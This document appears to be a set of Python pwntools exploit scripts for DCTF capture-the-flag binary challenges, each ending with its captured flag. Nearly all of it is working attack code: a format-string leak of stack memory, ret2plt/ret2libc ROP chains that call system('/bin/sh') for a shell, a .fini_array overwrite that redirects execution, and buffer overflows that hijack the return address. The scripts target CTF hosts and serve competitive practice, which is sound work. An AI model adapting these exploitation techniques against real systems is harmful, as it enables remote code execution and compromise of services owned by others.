dCTF pwn xploits
| from pwn import * | |
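import struct

HOST, PORT = 'dctf-chall-readme.westeurope.azurecontainer.io', 7481
# How many positional stack words to dump with %N$p.  NOTE(review): %0$p is
# not a valid positional reference in printf; iteration 0 is kept only to
# match the original run and relies on the parse fallback in decode_leak().
WORDS = 20


def decode_leak(token):
    """Convert one ``%N$p`` reply token into the 8 raw bytes it represents.

    ``token`` is the text printf produced for the pointer, e.g.
    ``'0x7b667463'`` or ``'(nil)'``.  Returns the little-endian packing of
    the value (what pwntools' ``p64`` would give), or ``b''`` when the token
    is not a non-negative 64-bit hex number, so the caller can simply
    concatenate the pieces.
    """
    try:
        value = int(token, 16)
        return struct.pack('<Q', value)
    except (ValueError, struct.error):
        return b''


def leak_word(index):
    """Open a fresh connection, send ``%<index>$p`` and return the reply token.

    The original exploit reconnects for every word (presumably the service
    answers once per connection); the socket is now closed again so a dump
    does not leave ``WORDS`` dangling connections.  The reply is split on
    whitespace and the second field is returned, matching the original
    parsing; ``None`` is returned when fewer than two fields came back,
    which previously raised IndexError and aborted the whole dump.
    """
    p = remote(HOST, PORT)
    try:
        p.recvline()  # banner
        p.sendline(f'%{index}$p'.encode())
        fields = p.recvline().decode().split()
    finally:
        p.close()
    return fields[1] if len(fields) > 1 else None


def main():
    """Dump the first ``WORDS`` stack words and print them as raw bytes.

    The flag sits on the stack of the target, so the concatenated leak
    contains it in plain text.  Only meant for the CTF host above.
    """
    context.log_level = 'critical'
    flag = b''
    for i in range(WORDS):
        token = leak_word(i)
        if token is not None:
            flag += decode_leak(token)
    print(flag)


if __name__ == '__main__':
    main()
#ctf{n0w_g0_r3ad_s0me_b00k5}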
| from pwn import * | |
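import hashlib
import os
import sys

HOST, PORT = 'dctf-chall-baby-bof.westeurope.azurecontainer.io', 7481
PROMPT = b"plz don't rop me\n"
# Filler from the start of vuln()'s buffer to the saved return address, as
# used by the original exploit (re-check with a cyclic pattern if the binary
# changes).
PAD = 0x12 * b'A'
# Hash fields a libc.rip ``/api/find`` entry may carry; any that are present
# must match the downloaded file.
HASH_KEYS = ('sha256', 'sha1', 'md5')


def digest_matches(data, entry):
    """Check a downloaded blob against the hashes of a libc-database entry.

    ``entry`` is one element of the libc.rip ``/api/find`` response.  Every
    key from ``HASH_KEYS`` that is present and non-empty must equal the
    corresponding digest of ``data`` (case-insensitively); absent keys are
    skipped, so an entry without any hash matches vacuously.  The caller is
    expected to warn in that case.
    """
    for algo in HASH_KEYS:
        expected = entry.get(algo)
        if not expected:
            continue
        actual = hashlib.new(algo, data).hexdigest()
        if actual.lower() != str(expected).lower():
            return False
    return True


def fetch_libc(puts):
    """Resolve the remote libc from a leaked ``puts`` address via libc.rip.

    Only the low 12 bits of ``puts`` are sent (the page offset survives ASLR).
    The first candidate is downloaded next to the script unless it already
    exists, verified against the hashes the database reports, and its file
    name is returned.  Returns ``None`` on any failure (no requests module,
    HTTP/JSON error, no candidate, malformed URL, hash mismatch); the caller
    decides how to proceed.  The original swallowed every error with a bare
    ``except`` and wrote whatever the redirect chain delivered to disk.
    """
    try:
        import requests
    except ImportError:
        log.critical('python-requests is not installed')
        return None
    try:
        r = requests.post('https://libc.rip/api/find',
                          json={'symbols': {'puts': hex(puts)[-3:]}},
                          timeout=30)
        r.raise_for_status()
        matches = r.json()
    except (requests.RequestException, ValueError) as exc:
        log.critical('libc.rip lookup failed: ' + str(exc))
        return None
    if not matches:
        log.critical('libc.rip returned no candidate for puts=' + hex(puts))
        return None
    entry = matches[0]
    libc_url = entry['download_url']
    libc_file = libc_url.rsplit('/', 1)[-1]
    if not libc_file:
        log.critical('unusable download_url: ' + repr(libc_url))
        return None
    if not os.path.exists(libc_file):
        log.info('getting: ' + libc_url)
        try:
            r = requests.get(libc_url, allow_redirects=True, timeout=60)
            r.raise_for_status()
        except requests.RequestException as exc:
            log.critical('libc download failed: ' + str(exc))
            return None
        if not any(entry.get(k) for k in HASH_KEYS):
            log.warning('no hash published for ' + libc_file + '; download is unverified')
        elif not digest_matches(r.content, entry):
            log.critical('hash mismatch for ' + libc_file + '; refusing to use it')
            return None
        with open(libc_file, 'wb') as fh:
            fh.write(r.content)
    return libc_file


def main():
    """ret2plt leak of puts, then ret2libc system("/bin/sh").

    Run with ``REMOTE`` set to attack the CTF host; otherwise the local
    binary is used and its libc is taken from pwntools.
    """
    binary = context.binary = ELF('./baby_bof')
    context.log_level = 'INFO'
    if not args.REMOTE:
        context.log_file = 'local.log'
        libc = binary.libc  # may be None if pwntools cannot locate it
        p = process(binary.path)
    else:
        context.log_file = 'remote.log'
        libc = None
        p = remote(HOST, PORT)

    rop = ROP([binary])
    pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]

    # Stage 1: puts(puts@GOT) leaks the libc address of puts, then return
    # into vuln() so the overflow can be triggered a second time.
    chain = [pop_rdi, binary.got.puts, binary.plt.puts, binary.sym.vuln]
    p.sendlineafter(PROMPT, PAD + b''.join(p64(a) for a in chain))
    p.recvline()
    # Six significant bytes of a canonical user-space pointer; pad to 8.
    puts = u64(p.recv(6).ljust(8, b'\0'))
    log.info('puts: ' + hex(puts))

    if libc is None:
        libc_file = fetch_libc(puts)
        if libc_file is None:
            log.critical('get libc yourself!')
            sys.exit(1)  # original exited 0 on failure
        libc = ELF(libc_file)
    libc.address = puts - libc.sym.puts
    log.info('libc.address: ' + hex(libc.address))

    # Stage 2: system("/bin/sh").  ``pop_rdi + 1`` is the lone ``ret`` of the
    # gadget (pop rdi is a single byte), inserted to keep rsp 16-byte aligned
    # at the call into system().
    binsh = next(libc.search(b'/bin/sh'))
    chain = [pop_rdi + 1, pop_rdi, binsh, libc.sym.system]
    p.sendlineafter(PROMPT, PAD + b''.join(p64(a) for a in chain))
    p.interactive()


if __name__ == '__main__':
    main()
#dctf{D0_y0U_H4v3_A_T3mpl4t3_f0R_tH3s3}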
| from pwn import * | |
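import hashlib
import os
import sys

# context.log_level = 'DEBUG'

HOST, PORT = 'dctf1-chall-hotel-rop.westeurope.azurecontainer.io', 7480
BANNER = b'Welcome to Hotel ROP, on main street '
PROMPT = b'You come here often?\n'
# Filler from the start of vuln()'s buffer to the saved return address, as
# used by the original exploit (re-check with a cyclic pattern if the binary
# changes).
PAD = 0x28 * b'A'
# Hash fields a libc.rip ``/api/find`` entry may carry; any that are present
# must match the downloaded file.
HASH_KEYS = ('sha256', 'sha1', 'md5')


def digest_matches(data, entry):
    """Check a downloaded blob against the hashes of a libc-database entry.

    ``entry`` is one element of the libc.rip ``/api/find`` response.  Every
    key from ``HASH_KEYS`` that is present and non-empty must equal the
    corresponding digest of ``data`` (case-insensitively); absent keys are
    skipped, so an entry without any hash matches vacuously.  The caller is
    expected to warn in that case.
    """
    for algo in HASH_KEYS:
        expected = entry.get(algo)
        if not expected:
            continue
        actual = hashlib.new(algo, data).hexdigest()
        if actual.lower() != str(expected).lower():
            return False
    return True


def fetch_libc(puts):
    """Resolve the remote libc from a leaked ``puts`` address via libc.rip.

    Only the low 12 bits of ``puts`` are sent (the page offset survives ASLR).
    The first candidate is downloaded next to the script unless it already
    exists, verified against the hashes the database reports, and its file
    name is returned.  Returns ``None`` on any failure (no requests module,
    HTTP/JSON error, no candidate, malformed URL, hash mismatch); the caller
    decides how to proceed.  The original swallowed every error with a bare
    ``except`` and wrote whatever the redirect chain delivered to disk.
    """
    try:
        import requests
    except ImportError:
        log.critical('python-requests is not installed')
        return None
    try:
        r = requests.post('https://libc.rip/api/find',
                          json={'symbols': {'puts': hex(puts)[-3:]}},
                          timeout=30)
        r.raise_for_status()
        matches = r.json()
    except (requests.RequestException, ValueError) as exc:
        log.critical('libc.rip lookup failed: ' + str(exc))
        return None
    if not matches:
        log.critical('libc.rip returned no candidate for puts=' + hex(puts))
        return None
    entry = matches[0]
    libc_url = entry['download_url']
    libc_file = libc_url.rsplit('/', 1)[-1]
    if not libc_file:
        log.critical('unusable download_url: ' + repr(libc_url))
        return None
    if not os.path.exists(libc_file):
        log.info('getting: ' + libc_url)
        try:
            r = requests.get(libc_url, allow_redirects=True, timeout=60)
            r.raise_for_status()
        except requests.RequestException as exc:
            log.critical('libc download failed: ' + str(exc))
            return None
        if not any(entry.get(k) for k in HASH_KEYS):
            log.warning('no hash published for ' + libc_file + '; download is unverified')
        elif not digest_matches(r.content, entry):
            log.critical('hash mismatch for ' + libc_file + '; refusing to use it')
            return None
        with open(libc_file, 'wb') as fh:
            fh.write(r.content)
    return libc_file


def main():
    """PIE rebase from the banner, ret2plt leak of puts, then ret2libc.

    Run with ``REMOTE`` set to attack the CTF host; otherwise the local
    binary is used and its libc is taken from pwntools.
    """
    binary = context.binary = ELF('./hotel_rop')
    if not args.REMOTE:
        context.log_file = 'local.log'
        libc = binary.libc  # may be None if pwntools cannot locate it
        p = process(binary.path)
    else:
        context.log_file = 'remote.log'
        libc = None
        p = remote(HOST, PORT)

    # The banner prints main()'s runtime address; subtracting the static
    # symbol gives the load base, which rebases every symbol and gadget
    # looked up below.
    p.recvuntil(BANNER)
    main_addr = int(p.recvline().strip(), 16)
    binary.address = main_addr - binary.sym.main
    log.info('binary.address: ' + hex(binary.address))

    #0x000000000000140b: pop rdi; ret;
    rop = ROP([binary])
    pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]

    # Stage 1: puts(puts@GOT) leaks the libc address of puts, then return
    # into vuln() so the overflow can be triggered a second time.
    chain = [pop_rdi, binary.got.puts, binary.plt.puts, binary.sym.vuln]
    p.sendlineafter(PROMPT, PAD + b''.join(p64(a) for a in chain))
    p.recvline()
    # Six significant bytes of a canonical user-space pointer; pad to 8.
    puts = u64(p.recv(6).ljust(8, b'\0'))
    log.info('puts: ' + hex(puts))

    if libc is None:
        libc_file = fetch_libc(puts)
        if libc_file is None:
            log.critical('get libc yourself!')
            sys.exit(1)  # original exited 0 on failure
        libc = ELF(libc_file)
    libc.address = puts - libc.sym.puts
    log.info('libc.address: ' + hex(libc.address))

    # Stage 2: system("/bin/sh").  ``pop_rdi + 1`` is the lone ``ret`` of the
    # gadget (pop rdi is a single byte), inserted to keep rsp 16-byte aligned
    # at the call into system().
    binsh = next(libc.search(b'/bin/sh'))
    chain = [pop_rdi + 1, pop_rdi, binsh, libc.sym.system]
    p.sendlineafter(PROMPT, PAD + b''.join(p64(a) for a in chain))
    p.interactive()


if __name__ == '__main__':
    main()
#dctf{ch41n_0f_h0t3ls}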
| #!/usr/bin/env python3 | |
| from pwn import * | |
| import signal | |
binary = context.binary = ELF('./magic_trick')
# Local variant kept for reference: preexec_fn makes the child ignore
# SIGALRM (presumably the binary arms an alarm() — confirm in the disassembly).
#p = process(binary.path,preexec_fn=lambda: signal.signal(signal.SIGALRM, signal.SIG_IGN))
p = remote('dctf-chall-magic-trick.westeurope.azurecontainer.io', 7481)
#pause()

# The service offers a write-what-where: it asks for the value first, then
# the address, both as decimal text.  Pointing the first .fini_array slot at
# win() gets it run by the loader's exit path.  The static section address
# is used as-is, so this only works if the binary is not PIE.
what = binary.sym.win
where = binary.get_section_by_name('.fini_array').header.sh_addr
for prompt, number in (('What do you want to write\n', what),
                       ('Where do you want to write it\n', where)):
    p.sendlineafter(prompt, str(number))
log.info(p.clean())
p.interactive()
#dctf{1_L1k3_M4G1c}
| from pwn import * | |
binary = context.binary = ELF('./pwn_sanity_check')
#p = process(binary.path)
p = remote('dctf1-chall-pinch-me.westeurope.azurecontainer.io',7480)

# 24 bytes of filler followed by the 8-byte value the program presumably
# checks (offset and constant taken from the original exploit; verify with a
# cyclic pattern if the binary changes).  0xdeadc0de is the other value the
# author tried.
overflow = b''.join([b'A' * 24, p64(0x1337c0de)])
# overflow += p64(0xdeadc0de)
p.recvline()
p.sendlineafter('Am I dreaming?\n', overflow)
p.interactive()
#dctf{y0u_kn0w_wh4t_15_h4pp3n1ng_b75?}
| from pwn import * | |
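binary = context.binary = ELF('./pwn_sanity_check')
#p = process(binary.path)
p = remote('dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io',7480)

# Gadgets are found by searching the binary for the raw instruction bytes,
# so the addresses are only usable directly if the binary is not PIE (the
# original worked that way; the unused ROP() object has been dropped).
pop_rdi = next(binary.search(asm('pop rdi; ret')))
pop_rsi_r15 = next(binary.search(asm('pop rsi; pop r15; ret')))

# SysV x86-64: win(rdi=0xdeadbeef, rsi=0x1337c0de).  The 0 only fills r15
# because the gadget pops it too.  win() is entered via ret, not call, so
# rsp is off by 8 compared with a normal call; this was fine for the
# original run, but add a lone `ret` before win if it faults on movaps.
chain = [pop_rdi, 0xdeadbeef, pop_rsi_r15, 0x1337c0de, 0, binary.sym.win]
# 72 bytes of filler reach the saved return address (offset from the
# original exploit; re-check with a cyclic pattern if the binary changes).
payload = b'A' * 72 + b''.join(p64(g) for g in chain)
# Prompt as bytes: recent pwntools warns on str arguments to tube methods.
p.sendlineafter(b'tell me a joke\n', payload)
p.interactive()
#dctf{Ju5t_m0v3_0n}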